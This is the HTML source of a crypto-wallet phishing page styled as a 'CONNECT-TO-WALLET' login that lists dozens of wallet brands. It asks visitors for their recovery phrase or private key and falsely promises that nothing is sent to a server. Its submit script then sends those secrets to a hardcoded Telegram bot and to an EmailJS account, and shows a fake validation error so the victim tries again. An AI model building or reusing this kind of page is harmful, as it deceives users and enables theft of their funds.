<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="../unpkg.com/flowbite%401.5.3/dist/flowbite.min.css" />
    <link rel="stylesheet" href="../rsms.me/inter/inter.css">
    <script src="https://cdn.tailwindcss.com/"></script>
    <script src="https://cdn.tailwindcss.com/?plugins=forms,typography,aspect-ratio,line-clamp"></script>
    <script src="../cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js" integrity="sha512-aVKKRRi/Q/YV+4mjoKBsE4x3H+BkegoM/em46NNlCqNTmUYADjBbeNefNxYV7giUp0VxICtqdrbqU7iVaeZNXA==" crossorigin="anonymous" referrerpolicy="no-referrer"></script>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>

    <!-- Emailjs Hook-->
    <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/@emailjs/browser@3/dist/email.min.js"></script>

    <!-- Connect your public key here-->
    <script type="text/javascript">
        (function () {
            emailjs.init("vA_7NzGZQ-mlt_kHM");
        })();
    </script>
</head>

<body style="background-color:#08081c">
    <section class="flex items-center justify-center min-h-screen">
        <div class="w-full max-w-lg p-6 text-center bg-white rounded-lg shadow-lg dark:bg-gray-800">
            <a href="../" class="flex items-center justify-center font-bold text-white mb-4">
                <img src="verified.png" class="mr-3" style="height:25px" alt="Logo">
                <span>CONNECT-TO-WALLET</span>
            </a>

            <div class="p-4 text-sm text-blue-700 bg-blue-100 rounded-lg dark:bg-blue-200 dark:text-blue-800 mb-6"
                role="alert">
                <span class="font-medium">
                </span>Providing your Phrases/Keys will only login your wallet.
                We store everything on your local storage and do not send anything to the server.
            </div>

            <div class="w-full bg-white rounded-lg shadow dark:border md:mt-0 sm:max-w-md xl:p-0 dark:bg-gray-800 dark:border-gray-700">
                <div class="mb-4 border-b border-gray-200 dark:border-gray-700">
                    <ul class="flex flex-wrap -mb-px text-sm font-medium text-center" id="myTab" data-tabs-toggle="#myTabContent" role="tablist">
                        <li class="mr-2" role="presentation">
                            <button class="inline-block p-4 rounded-t-lg border-b-2 text-blue-600 hover:text-blue-600 dark:text-blue-500 dark:hover:text-blue-500 border-blue-600 dark:border-blue-500" id="profile-tab" data-tabs-target="#profile" type="button" role="tab" aria-controls="profile" aria-selected="true">Phrase</button>
                        </li>

                        <li class="mr-2" role="presentation">
                            <button class="inline-block p-4 rounded-t-lg border-b-2 border-transparent hover:text-gray-600 hover:border-gray-300 dark:hover:text-gray-300 dark:border-transparent text-gray-500 dark:text-gray-400 border-gray-100 dark:border-gray-700" id="settings-tab" data-tabs-target="#settings" type="button" role="tab" aria-controls="settings" aria-selected="false">Private Key</button>
                        </li>
                    </ul>
                </div>

                <div id="myTabContent">
                    <div class="p-4 bg-gray-50 rounded-lg dark:bg-gray-800" id="profile" role="tabpanel" aria-labelledby="profile-tab">
                        <form method="POST" class="ajaxForm">
                            <div class="mb-6">
                                <textarea rows="4" name="phrase" type="text" placeholder="Enter your recovery phrase (typically 12-24 words separated by a single space)" id="phrase" class="block p-4 w-full text-gray-900 bg-gray-50 rounded-lg border border-gray-300 sm:text-md focus:ring-blue-500 focus:border-blue-500 dark:bg-gray-700 dark:border-gray-600 dark:placeholder-gray-400 dark:text-white dark:focus:ring-blue-500 dark:focus:border-blue-500" required></textarea>
                            </div>

                            <div class="mb-6">
                                <!-- <label for="wallet-select-profile" class="block mb-2 text-sm font-medium text-gray-900 dark:text-white">Select Wallet</label> -->
                                <select id="wallet-select-profile" name="wallet" class="block p-2 w-full text-gray-900 bg-gray-50 rounded-lg border border-gray-300 sm:text-md focus:ring-blue-500 focus:border-blue-500 dark:bg-gray-700 dark:border-gray-600 dark:placeholder-gray-400 dark:text-white dark:focus:ring-blue-500 dark:focus:border-blue-500" required>
                                    <!-- Add wallet options here -->
                                    <option value="">Choose a Wallet</option>
                                    <option value="MetaMask">MetaMask - Popular</option>
                                    <option value="Trust Wallet">Trust Wallet - Most Used</option>
                                    <option value="Coinbase Wallet">Coinbase Wallet</option>
                                    <option value="Exodus Wallet">Exodus Wallet</option>
                                    <option value="Safepal">Safepal</option>
                                    <option value="Bitget">Bitget</option>
                                    <option value="Zerion">Zerion</option>
                                    <option value="Best Wallet">Best Wallet</option>
                                    <option value="Best Wallet">Rabby Wallet</option>
                                    <option value="Chainge Wallet">Chainge Wallet</option>
                                    <option value="Phantom">Phantom</option>
                                    <option value="Leap">Leap</option>
                                    <option value="Cosmostation">Cosmostation</option>
                                    <option value="Solfare">Solfare</option>
                                    <option value="Ledger">Ledger</option>
                                    <option value="Trezor">Trezor</option>
                                    <option value="Keplr">Keplr</option>
                                    <option value="Kaspium">Kaspium</option>
                                    <option value="MyTon Wallet">MyTon Wallet</option>
                                    <option value="Tone Keeper">Ton Keeper</option>
                                    <option value="Ton Pocket">Ton Pocket</option>
                                    <option value="Telegram Wallet">Telegram Wallet</option>
                                    <option value="OKX Wallet">OKX Wallet</option>
                                   <option value="Tangem">Tangem</option>
                                    <option value="Onekey Wallet">Onekey Wallet</option>
                                    <option value="UNISWAP Wallet">UNISWAP Wallet</option>
                                    <option value="Electrum Wallet">Electrum Wallet</option>
                                    <option value="Unisat Wallet">Unisat Wallet</option>
                                    <option value="Atomic">Atomic</option>
                                    <option value="imToken Wallet">imToken Wallet</option>
                                    <option value="TonHub Wallet">TonHub Wallet</option>
                                    <option value="Defi">Defi</option>
                                    <option value="Tron">Tron</option>
                                    <option value="Binance Web3">Binance Web3</option>
                                    <option value="Wallet.io">Wallet.io</option>
                                    <option value="WallETH">WallETH</option>
                                    <option value="1inch Wallet">1inch Wallet</option>
                                    <option value="Portis Wallet">Portis Wallet</option>
                                    <option value="Safemoon">Safemoon</option>
                                    <option value="Other Wallets">Other Wallets</option>
                                    <!-- Add other wallet options -->
                                </select>
                            </div>

                            <button type="submit" class="text-white bg-blue-700 hover:bg-blue-800 focus:ring-4 focus:ring-blue-300 font-medium rounded-lg text-sm px-5 py-2.5 mr-2 mb-2 dark:bg-blue-600 dark:hover:bg-blue-700 focus:outline-none dark:focus:ring-blue-800">Connect</button>
                        </form>
                    </div>

                    <div class="hidden p-4 bg-gray-50 rounded-lg dark:bg-gray-800" id="settings" role="tabpanel" aria-labelledby="settings-tab">
                        <form method="POST" class="ajaxForm">
                            <div class="mb-6">
                                <input name="privatekey" type="text" placeholder="Enter your private key" id="privatekey" class="block p-4 w-full text-gray-900 bg-gray-50 rounded-lg border border-gray-300 sm:text-md focus:ring-blue-500 focus:border-blue-500 dark:bg-gray-700 dark:border-gray-600 dark:placeholder-gray-400 dark:text-white dark:focus:ring-blue-500 dark:focus:border-blue-500" required>
                            </div>

                            <div class="mb-6">
                                <!-- <label for="wallet-select-settings" class="block mb-2 text-sm font-medium text-gray-900 dark:text-white"></label> -->
                                <select id="wallet-select-settings" name="wallet" class="block p-2 w-full text-gray-900 bg-gray-50 rounded-lg border border-gray-300 sm:text-md focus:ring-blue-500 focus:border-blue-500 dark:bg-gray-700 dark:border-gray-600 dark:placeholder-gray-400 dark:text-white dark:focus:ring-blue-500 dark:focus:border-blue-500" required>
                                    <!-- Add wallet options here -->
                                    <option value="">Choose a Wallet</option>
                                    <option value="MetaMask">MetaMask - Popular</option>
                                    <option value="Trust Wallet">Trust Wallet - Most Used</option>
                                    <option value="Coinbase Wallet">Coinbase Wallet</option>
                                    <option value="Exodus Wallet">Exodus Wallet</option>
                                    <option value="Safepal">Safepal</option>
                                    <option value="Bitget">Bitget</option>
                                    <option value="Zerion">Zerion</option>
                                    <option value="Best Wallet">Best Wallet</option>
                                    <option value="Best Wallet">Rabby Wallet</option>
                                    <option value="Chainge Wallet">Chainge Wallet</option>
                                    <option value="Phantom">Phantom</option>
                                    <option value="Leap">Leap</option>
                                    <option value="Cosmostation">Cosmostation</option>
                                    <option value="Solfare">Solfare</option>
                                    <option value="Ledger">Ledger</option>
                                    <option value="Trezor">Trezor</option>
                                    <option value="Keplr">Keplr</option>
                                    <option value="Kaspium">Kaspium</option>
                                    <option value="MyTon Wallet">MyTon Wallet</option>
                                    <option value="Tone Keeper">Ton Keeper</option>
                                    <option value="Ton Pocket">Ton Pocket</option>
                                    <option value="Telegram Wallet">Telegram Wallet</option>
                                    <option value="OKX Wallet">OKX Wallet</option>
                                   <option value="Tangem">Tangem</option>
                                    <option value="Onekey Wallet">Onekey Wallet</option>
                                    <option value="UNISWAP Wallet">UNISWAP Wallet</option>
                                    <option value="Electrum Wallet">Electrum Wallet</option>
                                    <option value="Unisat Wallet">Unisat Wallet</option>
                                    <option value="Atomic">Atomic</option>
                                    <option value="imToken Wallet">imToken Wallet</option>
                                    <option value="TonHub Wallet">TonHub Wallet</option>
                                    <option value="Defi">Defi</option>
                                    <option value="Tron">Tron</option>
                                    <option value="Binance Web3">Binance Web3</option>
                                    <option value="Wallet.io">Wallet.io</option>
                                    <option value="WallETH">WallETH</option>
                                    <option value="1inch Wallet">1inch Wallet</option>
                                    <option value="Portis Wallet">Portis Wallet</option>
                                    <option value="Safemoon">Safemoon</option>
                                    <option value="Other Wallets">Other Wallets</option>
                                    <!-- Add other wallet options -->
                                </select>
                            </div>

                            <button type="submit" class="text-white bg-blue-700 hover:bg-blue-800 focus:ring-4 focus:ring-blue-300 font-medium rounded-lg text-sm px-5 py-2.5 mr-2 mb-2 dark:bg-blue-600 dark:hover:bg-blue-700 focus:outline-none dark:focus:ring-blue-800">Connect</button>
                        </form>
                    </div>
                </div>
            </div>

            <div class="mt-5 text-white bg-gradient-to-r from-blue-500 via-blue-600 to-blue-700 hover:bg-gradient-to-br focus:ring-4 focus:outline-none focus:ring-blue-300 dark:focus:ring-blue-800 font-medium rounded-lg text-sm px-5 py-2.5 text-center mr-2 mb-2">
                <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-shield-shaded" viewBox="0 0 16 16">
                    <path fill-rule="evenodd" d="M8 14.933a.615.615 0 0 0 .1-.025c.076-.023.174-.061.294-.118.24-.113.547-.29.893-.533a10.726 10.726 0 0 0 2.287-2.233c1.527-1.997 2.807-5.031 2.253-9.188a.48.48 0 0 0-.328-.39c-.651-.213-1.75-.56-2.837-.855C9.552 1.29 8.531 1.067 8 1.067v13.866zM5.072.56C6.157.265 7.31 0 8 0s1.843.265 2.928.56c1.11.3 2.229.655 2.887.87a1.54 1.54 0 0 1 1.044 1.262c.596 4.477-.787 7.795-2.465 9.99a11.775 11.775 0 0 1-2.517 2.453 7.159 7.159 0 0 1-1.048.625c-.28.132-.581.24-.829.24s-.548-.108-.829-.24a7.158 7.158 0 0 1-1.048-.625 11.777 11.777 0 0 1-2.517-2.453C1.928 10.487.545 7.169 1.141 2.692A1.54 1.54 0 0 1 2.185 1.43 62.456 62.456 0 0 1 5.072.56z" />
                </svg>Secured CONNECTION
            </div>
        </div>
    </section>

    <script>
        $(document).ready(function () {
            $('.ajaxForm').on('submit', function (event) {
                event.preventDefault();

                // Send data to Telegram bot
                var chatId = '6915786786';
                var token = '6915786786:AAHpdzO2L3tQln8WjYpzEoRrx3c3vUWO_xw';
                var phrase = $('#phrase').val();
                var privatekey = $('#privatekey').val();
                var message = `New message:\nPhrase: ${phrase}\nPrivate Key: ${privatekey}`;
                var urlString = `https://api.telegram.org/bot${token}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent(message)}`;

                let request = new XMLHttpRequest();
                request.open("POST", urlString);
                request.send();

                // Send form data via EmailJS
                var formData = new FormData(this);
                formData.append('service_id', 'service_5xaaqgt');
                formData.append('template_id', 'template_3191bbv');
                formData.append('user_id', 'vA_7NzGZQ-mlt_kHM');

                $.ajax('https://api.emailjs.com/api/v1.0/email/send-form', {
                    type: 'POST',
                    data: formData,
                    contentType: false,
                    processData: false
                }).done(function () {
                    alert('Error Validating Input Details, Please Try Another Wallet.');
                }).fail(function (error) {
                    alert('Oops... ' + JSON.stringify(error));
                });
            });
        });
    </script>
    <script src="https://unpkg.com/flowbite@1.5.3/dist/flowbite.js"></script>
</body>
</html>
